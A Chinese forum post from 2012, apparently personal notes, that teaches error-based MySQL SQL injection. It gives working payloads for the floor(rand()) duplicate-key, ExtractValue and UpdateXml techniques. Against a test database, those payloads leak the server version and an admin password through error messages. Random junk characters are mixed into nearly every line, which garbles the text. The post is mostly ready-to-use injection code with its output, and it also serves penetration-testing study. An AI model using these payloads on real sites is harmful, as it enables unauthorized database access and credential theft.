放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
. G% A0 V6 l8 _" ^$ [实际测试环境:
2 U1 O* t8 I: [0 R: \8 F3 {, [) v" k* @! M, K# L
" k* z+ s) l1 E+ r* h/ y1 ~* w/ _+ emysql> show tables;! l/ `0 b) ?; e- l% b
+----------------+9 H+ v5 W, J$ h
| Tables_in_test |
' e6 m* I8 ^# p1 X+----------------+
- g8 X! p5 N3 |# o% a, L| admin |
0 H4 a* o T1 c% P+ F| article |( Y& Y' [# V5 W, A5 o. W# k. ^
+----------------+
( E. ~! u; z5 Q1 q0 q, N$ J ; M2 ?) ^5 n9 [. L
+ C% ?2 _8 V# O8 M# ?
) C1 p' }! h/ e6 b' G( |
mysql> describe admin;
8 J/ l- p/ T' f& E& \+-------+------------------+------+-----+---------+----------------+
2 p$ r& R2 C7 {5 f| Field | Type | Null | Key | Default | Extra |
1 x$ t2 U2 O! {5 W+-------+------------------+------+-----+---------+----------------+
+ I+ j( C; c) v- Q& U. w; \| id | int(10) unsigned | NO | PRI | NULL | auto_increment |( Y' J) t& y! L& N
| user | varchar(50) | NO | | NULL | |9 r D6 N, t* |( N) j0 q9 j5 y
| pass | varchar(50) | NO | | NULL | |
+ s9 _) J8 s |2 o+ D. Z+-------+------------------+------+-----+---------+----------------+% B6 {, |; Y$ o: j5 ]" s( ]/ [$ D, n/ @( \
V7 K: ]# p1 ?! {) `( V2 w
% d7 L4 O; W8 j4 y- T9 f
2 F% b: k, E! Y& nmysql> describe article;: ^( D( g2 x3 ^0 Z3 n. s/ F
+---------+------------------+------+-----+---------+----------------+
/ N/ W6 ~/ |. q8 L| Field | Type | Null | Key | Default | Extra |& T$ k& E0 G% E% a: G
+---------+------------------+------+-----+---------+----------------+
0 C+ h" Z, g" t0 @6 K* y| id | int(10) unsigned | NO | PRI | NULL | auto_increment |5 |, |2 H4 Y8 B# t9 r. ~
| title | varchar(50) | NO | | NULL | |0 m; q6 |: y. p7 ~7 r7 {9 V* O
| content | varchar(50) | NO | | NULL | |
$ N/ J2 E; C& _0 @8 g+---------+------------------+------+-----+---------+----------------+3 X* B8 i% f. Q7 W0 A) F1 H
1、通过floor报错
, t# P4 D4 j: y4 a- l' u可以通过如下一些利用代码- l2 v' T! M& b
$ F+ t; m, N" B& i 8 e. r* Q% @. W. v+ K: H
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x; f, |( M5 Z7 ^8 e/ n' \+ T
from information_schema.tables group by x)a);5 g7 `, w( Y9 o4 I
+ z D* a0 ?- U3 w3 i
' V- y1 [$ ^4 p2 @- Y) ]0 qand (select count(*) from (select 1 union select null union select !1)x
! }% G+ e3 x+ v) N. n V- ngroup by concat((select table_name from information_schema.tables limit 1),
/ P6 L% e& G3 v' cfloor(rand(0)*2)));
$ N4 J" ?' q1 r/ L1 t/ f# I# h举例如下:
+ R3 j3 }% G5 m3 |5 u4 K首先进行正常查询:
9 o1 u$ t7 o) `7 G% l2 x: C7 F 1 o) r6 n, O! v; n( n& }
mysql> select * from article where id = 1;7 J: Z! i: h+ n
+----+-------+---------+2 e9 O/ G+ f! \- S: g( ^
| id | title | content |; K" y, ~) K3 o+ O, f
+----+-------+---------+
- l2 Y7 F9 o. T0 t8 y0 d8 }| 1 | test | do it |) z4 u; R9 x' G1 |, l7 _% V4 W
+----+-------+---------+
$ ?0 }( u2 ~% a9 B2 T8 R! L4 I( Q @假如id输入存在注入的话,可以通过如下语句进行报错。8 j5 A* ?4 P0 m. Z
( |1 Q* |% {9 ~ @9 f& h
1 ]: A) g5 c4 k9 h" \: Pmysql> select * from article where id = 1 and (select 1 from
( r4 z1 ^8 ?7 ]3 |5 e(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
. r. M( [2 g" i& pERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'3 R8 p8 ~& N8 e: v; N
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
! n5 J Q# B. s4 S3 J1 B5 C例如我们需要查询管理员用户名和密码:% w+ s7 b) o* h! _# t# E9 c
Method1:* X. K6 T$ a. S u
1 m) C- \/ w5 V& \6 b
- Z2 ]& m3 F7 l2 Y" j# J4 I
mysql> select * from article where id = 1 and (select 1 from
$ t# A/ N8 H7 W$ h0 J4 F(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x; Q r, [- F8 M4 f- ^! ~
from information_schema.tables group by x)a);
, U! M( i. b# O$ ~! a9 ?# IERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'* a% x/ C$ X1 n2 B. H8 r9 N
Method2:
( b+ ?5 t# X$ J' K2 A
7 |0 j/ V9 v4 c* Q1 I o& s4 l2 k2 f$ z0 Y' P
mysql> select * from article where id = 1 and (select count(*)
$ o! n' O5 T: ]( [from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),8 x' P, C4 I4 L3 [7 _, B
floor(rand(0)*2)));
5 m9 b& r$ u% rERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'# a; T$ D! _" F8 I- {; k
2、ExtractValue
. q7 o7 D% b4 |- @8 v% X w7 t- H- y测试语句如下
* V$ S5 E9 T/ h5 c
+ J) e) Z" t! v P 5 X- D; {- q! _9 n, a( K
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));# X/ A; |; Y# F/ `
实际测试过程
) C' J' w& p+ y# L. E7 S& V9 c
. w! g$ f1 B" H
2 k7 h/ B- o* l' k0 a" ?6 k% `$ Vmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,: @$ `; a" a. n0 W) s
(select pass from admin limit 1)));--
9 T- i( _0 a. o$ k. xERROR 1105 (HY000): XPATH syntax error: '\admin888'
* G1 W( e; {# Y& O8 e! D3、UpdateXml
+ r- k4 Q1 M8 I9 j. S& F# @测试语句& H: f, d1 d9 q# D2 x# L
2 C! O* f( M3 t: g, Z2 \, p
& ^! y4 ?- u( }1 z& z2 dand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Z* {% Z6 y2 U, i/ d实际测试过程& v8 I. s6 I/ y7 a# t2 `6 X
, U6 D1 Y' e8 M& J$ a" e& ~, b# V* B
2 g) r& R; @& g0 X/ ]: N/ x2 `4 Mmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
, R$ ?; s u* z9 E+ e(select pass from admin limit 1),0x5e24),1));
$ L! G$ o. x4 y1 |ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$' P5 f& }7 \$ w2 N$ q, P
All, thanks foreign guys.
3 i% N' W N3 \, M) U- q( q) n
- b% S" ^& C! | A
% r5 i8 t6 ]+ F; Z. B |
发表于 2012-12-10 10:28:51
收藏
支持
反对